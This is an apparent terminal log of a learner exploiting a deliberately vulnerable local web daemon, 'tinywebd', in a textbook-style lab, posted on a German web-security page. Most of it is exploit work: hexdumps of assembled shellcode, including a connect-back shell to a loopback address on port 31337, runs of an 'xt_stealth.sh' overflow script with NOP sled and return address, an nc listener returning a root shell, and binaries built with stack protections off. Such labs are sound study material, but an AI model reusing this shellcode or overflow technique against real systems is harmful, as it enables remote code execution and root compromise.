root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm mark_restore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C mark_restore
00000000  eb 26 5b 31 c9 88 4b 07  6a 05 58 66 b9 41 04 31  |.&[1..K.j.Xf.A.1|
00000010  d2 66 ba 80 01 cd 80 89  c3 6a 06 58 cd 80 8d 6c  |.f.......j.X...l|
00000020  24 68 68 73 8f 04 08 c3  e8 d5 ff ff ff 2f 48 61  |$hhs........./Ha|
00000030  63 6b 65 64 58                                    |ckedX|
00000035
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# rm /Hacked
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_stealth.sh mark_restore 127.0.01
target IP: 127.0.01
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (332 b)] [shellcode (53 b)] [ret addr (128 b)]
Connection to 127.0.01 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /Hacked
-rw------- 1 root root 0 Sep 13 21:42 /Hacked
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ps aux | grep tinywebd
root      2403  0.0  0.0   2180   368 ?        Ss   21:42   0:00 ./tinywebd
root      2424  0.0  0.0   5924   840 pts/0    S+   21:43   0:00 grep --color=auto tinywebd
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./webserver_id 127.0.0.1
The web server for 127.0.0.1 is Tiny webserver
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# rm /Hacked
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /Hacked
ls: Zugriff auf /Hacked nicht möglich: Datei oder Verzeichnis nicht gefunden


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_stealth.sh mark_restore 127.0.01
target IP: 127.0.01
shellcode: mark_restore (53 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (332 b)] [shellcode (53 b)] [ret addr (128 b)]
Connection to 127.0.01 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ls -l /Hacked
-rw------- 1 root root 0 Sep 13 21:48 /Hacked

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gedit
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm loopback_shell_restore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C loopback_shell_restore
00000000  6a 02 58 cd 80 85 c0 74  0a 8d 6c 24 68 68 73 8f  |j.X....t..l$hhs.|
00000010  04 08 c3 6a 66 58 99 31  db 43 52 6a 01 6a 02 89  |...jfX.1.CRj.j..|
00000020  e1 cd 80 96 6a 66 58 43  68 7f bb bb 01 66 89 54  |....jfXCh....f.T|
00000030  24 01 66 68 7a 69 66 53  89 e1 6a 10 51 56 89 e1  |$.fhzifS..j.QV..|
00000040  43 cd 80 87 f3 87 ce 49  b0 3f cd 80 49 79 f9 b0  |C......I.?..Iy..|
00000050  0b 52 68 2f 2f 73 68 68  2f 62 69 6e 89 e3 52 89  |.Rh//shh/bin..R.|
00000060  e2 53 89 e1 cd 80                                 |.S....|
00000066
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nc -l -p 31337 &
[1] 2478
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_stealth.sh loopback_shell_restore 127.0.0.1
target IP: 127.0.0.1
shellcode: loopback_shell_restore (102 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (283 b)] [shellcode (102 b)] [ret addr (128 b)]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# fg
nc -l -p 31337
whoami
root
^C
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./webserver_id 127.0.01
The web server for 127.0.01 is Tiny webserver
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# fg
-su: fg: gegenwärtig: Kein solcher Job.
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nc -l -p 31337 &
[1] 2499
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# fg
nc -l -p 31337
whoami
^C
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# fg
-su: fg: gegenwärtig: Kein solcher Job.
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./webserver_id 127.0.01
The web server for 127.0.01 is Tiny webserver
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gcc -g -fno-stack-protector -z execstack -o addr_struct addr_struct.c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./addr_struct 12.34.56.78 9090
## 
   "8N  Proot@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./addr_struct 12.34.56.78 9090 | hexdump -C
00000000  02 00 23 82 0c 22 38 4e  ab 85 04 08 00 50 fc b7  |..#.."8N.....P..|
00000010
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# grep 0x xt_stealth.sh
RETADDR="\x24\xf5\xff\xbf" # at +100 bytes from buffer @ 0xbffff5c0
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q -batch -ex "p /x 0xbffff5c0 +15"
$1 = 0xbffff5cf

   

Websicherheit...  

   
© ALLROUNDER